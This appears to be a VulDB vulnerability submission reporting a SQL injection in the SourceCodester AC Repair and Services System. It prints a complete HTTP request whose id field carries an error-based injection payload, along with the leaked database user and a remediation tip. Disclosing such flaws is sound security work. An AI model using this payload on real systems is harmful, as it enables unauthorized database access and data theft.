Soumettre #182578: SourceCodester AC Repair and Services System sql injection in Master.php information

TitreSourceCodester AC Repair and Services System sql injection in Master.php
DescriptionI find a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html) This affect the file /classes/Master.php?f=delete_inquiry: POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278 Content-Length: 913 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="fullname" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="email" [email protected] -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="contact" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="address" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="services[]" 1 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="status" 0 -----------------------------2854294418240524322736048278-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This return value undoubtedly proves the existence of an SQL injection vulnerability here The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
La source⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Utilisateur
 L2ncE (UID 50751)
Soumission14/07/2023 05:29 (il y a 3 ans)
Modérer15/07/2023 09:29 (1 day later)
StatutAccepté
Entrée VulDB234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry ID injection SQL]
Points20

PrécédentAperçuSuivant

Might our Artificial Intelligence support you?

Check our Alexa App!